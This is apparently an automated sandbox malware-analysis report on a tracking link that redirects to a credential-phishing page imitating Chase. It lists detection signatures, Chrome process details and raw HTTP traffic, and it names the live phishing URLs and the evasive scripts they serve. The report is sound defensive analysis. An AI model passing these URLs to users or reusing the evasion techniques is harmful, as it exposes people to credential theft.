Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://juddshaw.acemlnc.com/lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~jusw

Overview

General Information

Sample URL:https://juddshaw.acemlnc.com/lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~jusw
Analysis ID:1585596
Infos:

Detection

HTMLPhisher
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
AI detected suspicious Javascript
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 5252 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5480 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2240,i,15377954421907004897,9575579198436454196,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6524 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://juddshaw.acemlnc.com/lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~jusw" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
2.7.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: https://sandvikgroups.com/?auth&apitoken=qrd0fg2hx9ez7rrJoe Sandbox AI: Score: 9 Reasons: The brand 'Chase' is a well-known financial institution with a legitimate domain of 'chase.com'., The provided URL 'sandvikgroups.com' does not match the legitimate domain of Chase., The URL 'sandvikgroups.com' does not have any known association with the Chase brand., The presence of input fields for 'Username' and 'Password' on a non-associated domain is suspicious and indicative of phishing., The domain 'sandvikgroups.com' does not resemble 'chase.com' and could be attempting to impersonate or mislead users. DOM: 2.7.pages.csv
    Source: Yara matchFile source: 2.7.pages.csv, type: HTML
    Source: 0.14.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://sandvikgroups.com/?auth&apitoken=qrd0fg2hx... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load an external script from an unknown source, along with the obfuscated nature of the code, suggests this is a highly suspicious and potentially malicious script.
    Source: 0.6.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://sandvikgroups.com/?cono... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load additional scripts and the obfuscation of the script's purpose raise significant security concerns. While the script may have a legitimate purpose, such as implementing a security challenge, the overall behavior is highly suspicious and indicative of a potential attack vector.
    Source: 0.5.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://sandvikgroups.com/?cono... This script demonstrates several high-risk behaviors, including dynamic code execution via `eval()` and obfuscated code. It also sets a cookie with an expiration date in the future, which could be used for malicious purposes. The script appears to be testing for the presence of various headless browser and automation tools, suggesting it may be attempting to evade detection. Overall, the combination of these behaviors indicates a high likelihood of malicious intent, warranting a risk score of 9.
    Source: https://sandvikgroups.com/?auth&apitoken=qrd0fg2hx9ez7rrHTTP Parser: Number of links: 0
    Source: https://sandvikgroups.com/?conoHTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#B20F03" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#B20F03" d="M17.038 18.615H14.87L14.563 9.5h2....
    Source: https://sandvikgroups.com/?auth&apitoken=qrd0fg2hx9ez7rrHTTP Parser: Title: Sign in does not match URL
    Source: https://sandvikgroups.com/?auth&apitoken=qrd0fg2hx9ez7rrHTTP Parser: <input type="password" .../> found
    Source: https://sandvikgroups.com/?conoHTTP Parser: No favicon
    Source: https://sandvikgroups.com/?conoHTTP Parser: No favicon
    Source: https://sandvikgroups.com/?conoHTTP Parser: No favicon
    Source: https://sandvikgroups.com/?conoHTTP Parser: No favicon
    Source: https://sandvikgroups.com/?auth&apitoken=qrd0fg2hx9ez7rrHTTP Parser: No <meta name="author".. found
    Source: https://sandvikgroups.com/?auth&apitoken=qrd0fg2hx9ez7rrHTTP Parser: No <meta name="copyright".. found
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: juddshaw.activehosted.com to https://sandvikgroups.com/?cono
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: juddshaw.activehosted.com to https://sandvikgroups.com/?cono
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~jusw HTTP/1.1Host: juddshaw.acemlnc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~jusw HTTP/1.1Host: juddshaw.activehosted.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /?cono HTTP/1.1Host: sandvikgroups.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~jusw HTTP/1.1Host: juddshaw.activehosted.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=2fecf0125781b33d31f64d2ffcd6cd91; cmp652497115=8d0b7ede170208f0b44e002e53875116; __cf_bm=UUUeLQDQdlijINbz4dlpy64aILUWtnS_rwpD8HZJA9M-1736283953-1.0.1.1-Ey17XGAkkE89fHbEIfnxM87SHKRpyukEmmHNwNL11pS_uFwxoQF4dZ7JLqjE4SFMqJouRqeF3aonlEBvwtp8gw
    Source: global trafficHTTP traffic detected: GET /?cono HTTP/1.1Host: sandvikgroups.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8fe6e8a6e884443e HTTP/1.1Host: sandvikgroups.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sandvikgroups.com/?cono&__cf_chl_rt_tk=nUWoOexFbtyZYvkeY72JgAtahWk3ffcRNyuxztq1Kx0-1736283956-1.0.1.1-LkclPWyYRrvRBxCvgln12SiuSNVtEEGwaasMK0OiMpEAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js?onload=FirmE4&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://sandvikgroups.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8fe6e8a6e884443e HTTP/1.1Host: sandvikgroups.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: sandvikgroups.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sandvikgroups.com/?conoAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js?onload=FirmE4&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/397843571:1736281603:ect8I6OU7F0koaDox1VrDHVsHkABB-y9YHkkrx60-68/8fe6e8a6e884443e/58_S4_P7D1bxAd7lrVVuyth7KNXgXFASaYVEZk8veLM-1736283956-1.2.1.1-0wbzDXCv9bibZZn4V5b_DjzZwQbfCQlppZo.InrmlaniOPny2OjSbFRdAn9E2dld HTTP/1.1Host: sandvikgroups.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/q622a/0x4AAAAAAAAjq6WYeRDKmebM/light/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe6e8bcbdc57d11&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/q622a/0x4AAAAAAAAjq6WYeRDKmebM/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/q622a/0x4AAAAAAAAjq6WYeRDKmebM/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe6e8bcbdc57d11&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: sandvikgroups.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sandvikgroups.com/?conoAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/442655786:1736281748:kg17Jh4QwkIjazyMgCUACxDcKqgDYMNi1u3JYjXPALY/8fe6e8bcbdc57d11/Gt25uDESdAvJ6jww.JeJp3K3qkyx5r7rWJW3NwOWfhg-1736283959-1.1.1.1-zHBdodP33CmwVXOzXIJxOYl7ZcK_vAAcBoIVDvmo4Qzxc5eyAvqOG3Ale2tpAPnN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8fe6e8bcbdc57d11/1736283961787/b7fe36ccacf88b8ba6160e9ac00363e293e2fd6784516cecc5ed9fccfb35fccf/gBU2stsMjJYtGBV HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/q622a/0x4AAAAAAAAjq6WYeRDKmebM/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8fe6e8bcbdc57d11/1736283961788/nEvdn7auSgI5cmy HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/q622a/0x4AAAAAAAAjq6WYeRDKmebM/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8fe6e8bcbdc57d11/1736283961788/nEvdn7auSgI5cmy HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/442655786:1736281748:kg17Jh4QwkIjazyMgCUACxDcKqgDYMNi1u3JYjXPALY/8fe6e8bcbdc57d11/Gt25uDESdAvJ6jww.JeJp3K3qkyx5r7rWJW3NwOWfhg-1736283959-1.1.1.1-zHBdodP33CmwVXOzXIJxOYl7ZcK_vAAcBoIVDvmo4Qzxc5eyAvqOG3Ale2tpAPnN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/442655786:1736281748:kg17Jh4QwkIjazyMgCUACxDcKqgDYMNi1u3JYjXPALY/8fe6e8bcbdc57d11/Gt25uDESdAvJ6jww.JeJp3K3qkyx5r7rWJW3NwOWfhg-1736283959-1.1.1.1-zHBdodP33CmwVXOzXIJxOYl7ZcK_vAAcBoIVDvmo4Qzxc5eyAvqOG3Ale2tpAPnN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/397843571:1736281603:ect8I6OU7F0koaDox1VrDHVsHkABB-y9YHkkrx60-68/8fe6e8a6e884443e/58_S4_P7D1bxAd7lrVVuyth7KNXgXFASaYVEZk8veLM-1736283956-1.2.1.1-0wbzDXCv9bibZZn4V5b_DjzZwQbfCQlppZo.InrmlaniOPny2OjSbFRdAn9E2dld HTTP/1.1Host: sandvikgroups.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: sandvikgroups.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sandvikgroups.com/?cono&__cf_chl_tk=nUWoOexFbtyZYvkeY72JgAtahWk3ffcRNyuxztq1Kx0-1736283956-1.0.1.1-LkclPWyYRrvRBxCvgln12SiuSNVtEEGwaasMK0OiMpEAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
